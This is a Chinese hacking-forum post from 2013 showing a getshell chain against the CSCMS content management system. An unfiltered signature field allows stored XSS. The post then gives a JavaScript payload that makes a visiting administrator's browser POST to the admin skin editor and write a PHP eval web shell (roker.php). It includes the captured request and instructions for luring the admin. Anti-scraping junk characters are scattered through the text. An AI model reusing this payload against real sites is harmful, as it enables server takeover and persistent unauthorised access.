|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
5 A5 Z/ G$ F; \$ Y3 d官网已经修补了,所以重新下了源码
% a# ? _2 `3 c2 o P因为 后台登入 还需要认证码 所以 注入就没看了。
' Z. m! O4 c- a4 |+ x0 C存在 xss
$ l3 H; F6 a# K. ~; `+ e; e漏洞文件 user/member/skin_edit.php
3 F% e9 F+ x M9 _3 a本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:! e# G; W9 Y# I8 |- }
, m) u5 m G2 K7 j/ i* c: m
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
7 Z+ Q K+ j6 c! I: y% ~ ! j7 n% F c f& ^4 @/ P: m7 x
</textarea></td></tr>" _; s' x F4 A' b; j
* p k6 t0 W% Q) \' O! M7 n5 d( J
user/do.php
9 I+ o; l' b- D
: d' N! U. s. C8 C; z; B: T1 B4 Z9 j- P
if($op=='zl'){ //资料+ a3 {$ C2 {6 F
$ @5 e& L1 c" M) ~: z4 u$ N
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 6 u+ j D: p$ T2 a
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));( Z. }; d3 f1 u f5 s, [+ T$ S2 N
& W3 ~0 m* o( v& e! E
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
) `5 X3 ]$ z' v" [ : W1 J* t7 s" }3 A/ S0 l% @& v
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
4 t( l. G/ N# @! }7 z' @- W" h where CS_Name='".$cscms_name."'";1 }$ a0 G- M, P: t$ d& G2 @
+ r1 E" J8 a) h# O
if($db->query($sql)){! j: `9 A0 r1 `8 `
: d2 [6 |1 w/ {+ e2 E
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
# S3 \# i0 E" q1 a
' E8 _) S+ b, M% z# ~) q1 F# I& Y$ Q }else{
1 u G9 C" G5 g, r% e, b
T' X, k' B8 O exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));6 [9 e0 W6 F" t- A8 g3 S
! P* j. p+ `5 F
}
! ?8 Q, l' j% p' R4 ]. J' j( i
; R0 x- ^9 n5 ?# C8 T
. n/ ~8 i. @2 o U8 ]2 C没有 过滤导致xss产生。# _9 q W( q% ?( v J/ d% @
后台 看了下 很奇葩的是可以写任意格式文件。。
, h; m) E/ a9 s抓包。。
6 W$ R c3 S* W" V
. N8 K7 d+ P. y# p+ u
! D# y. @: e, R& T+ ^# s本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
) A5 [" G( s$ }0 S8 f# P8 W
0 s0 x2 x% V% w; QAccept: text/html, application/xhtml+xml, */*
7 d7 H3 E% P. {1 _6 s: f( h/ K
$ ~ g: _/ _" d0 D! f( K7 T, q% E! gReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; `5 C' c0 \1 X% K; n& F5 @
+ ]8 r$ B3 L" W! O q& J
Accept-Language: zh-CN
: \ T$ t( ^4 u4 _ z% d; p3 t9 V
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
+ M7 _7 x+ L+ i& @ 7 {& O; b' o9 |6 t5 b' \* T
Content-Type: application/x-www-form-urlencoded* t* L ?5 E% a6 `: Z
W/ h% d6 T5 F$ ~& Q- A8 LAccept-Encoding: gzip, deflate4 e8 f$ x. R7 n3 g( _) x
5 ~& M9 E N1 | k- N1 s: J; Z
Host: 127.0.0.12 I2 F* Q: u# \: W- J: a' w; }
$ v4 @/ Z( s9 H- {& X Y# x
Content-Length: 38
! V$ y3 ^' `1 D3 w8 M . O9 C: L4 Q* b: {
DNT: 1
* m0 z; C) i: X- K0 v4 }+ d
- U# S3 d9 E* h" IConnection: Keep-Alive
8 \% n* { ^8 r7 _, h0 I
! S$ t* S; [) P% a" k- tCache-Control: no-cache Y8 p8 n/ u E/ L: G |; m J
7 N# K5 }* s% n8 d6 p$ H$ a5 V& oCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
# j) _4 q( k$ e; `' \ % i P2 c1 m$ S/ f K
: G4 ?) a# j! X, B9 `+ }+ bname=aaa.php&content=%3Cs%3E%3Ca%25%3E) C) N1 C7 k8 s3 a% m4 i' }; l
! ?' |5 a8 U- [/ B8 {1 k5 E# J2 l/ v& e
& T4 E1 o/ a9 g/ n5 K$ I于是 构造js如下。
5 Q/ @, C0 S$ |% D) C. j
9 g; O5 B1 M F, B2 ^本帖隐藏的内容<script> 3 Q9 A0 h8 q2 u& \# b# Q% u
thisTHost = top.location.hostname;
: F7 i( m. Q) n. q9 O 7 T8 u( ]% A5 R1 _2 S9 _4 _
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";1 s$ X" p2 E+ ]7 D$ B
! V1 D; q( [% D2 M: H3 ~function PostSubmit(url, data, msg) { 5 a2 n$ r3 j% i4 V; q
var postUrl = url;0 k: O6 L* k P
, A& {" \! }# y7 ^' h8 O
var postData = data;
; j! a j& ]1 |3 k2 Y% I2 l" I% J var msgData = msg; ' e- R u+ D5 F* ~
var ExportForm = document.createElement("FORM");
8 \' Q3 s+ `; x7 ]% v9 G' {( ] document.body.appendChild(ExportForm); 6 K4 m+ F1 A; R v
ExportForm.method = "POST";
' M! Q3 W* i: u; | var newElement = document.createElement("input"); $ I" ]# ]# a3 Q& U
newElement.setAttribute("name", "name"); " G+ ]* O) ^/ a9 ?. V$ A
newElement.setAttribute("type", "hidden"); 7 Y( y: p7 p6 A* `% [; N2 o
var newElement2 = document.createElement("input"); ; r* q8 D9 a% g. \2 j0 @/ i A% M( @
newElement2.setAttribute("name", "content");
. Y; Q7 x$ v7 \/ b+ ?% ^6 P0 C0 O# y newElement2.setAttribute("type", "hidden"); : m5 a4 V; N2 n: E: L3 b) g! a
ExportForm.appendChild(newElement); ; \# Y3 f5 @, i0 d
ExportForm.appendChild(newElement2);
, M1 B4 h W. B: D: s7 Y% K newElement.value = postData; . P6 K* W \$ D8 y3 J8 A( P
newElement2.value = msgData; 5 _0 l, T5 z" A ^" P! r
ExportForm.action = postUrl; - F( x; @& u7 u. N% [
ExportForm.submit();
& b# n" ?2 W4 b5 s( b+ f: h};
9 {3 e+ l" ]6 w( ?0 ] F) `& Q: o0 z ; Q4 j- P+ j1 R9 _0 F- i7 x
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");% t4 {9 }, d; J2 K; R% O( }- R) O% c
1 n3 Y1 z8 X5 F; H* ^! w</script>
2 U, L5 R8 ~8 W5 q. w! _
& X- C6 ]0 e: ]. n; F N
, M) R6 n6 w6 J$ Z$ ]
- G" x9 A5 Z0 G7 q2 [4 q' J$ Z7 X& I. Ihttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
1 n/ G m) P3 k9 f" i" h用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
6 L9 q0 j0 v$ r1 I就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
! S- a. ~9 Q: t/ a6 n |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对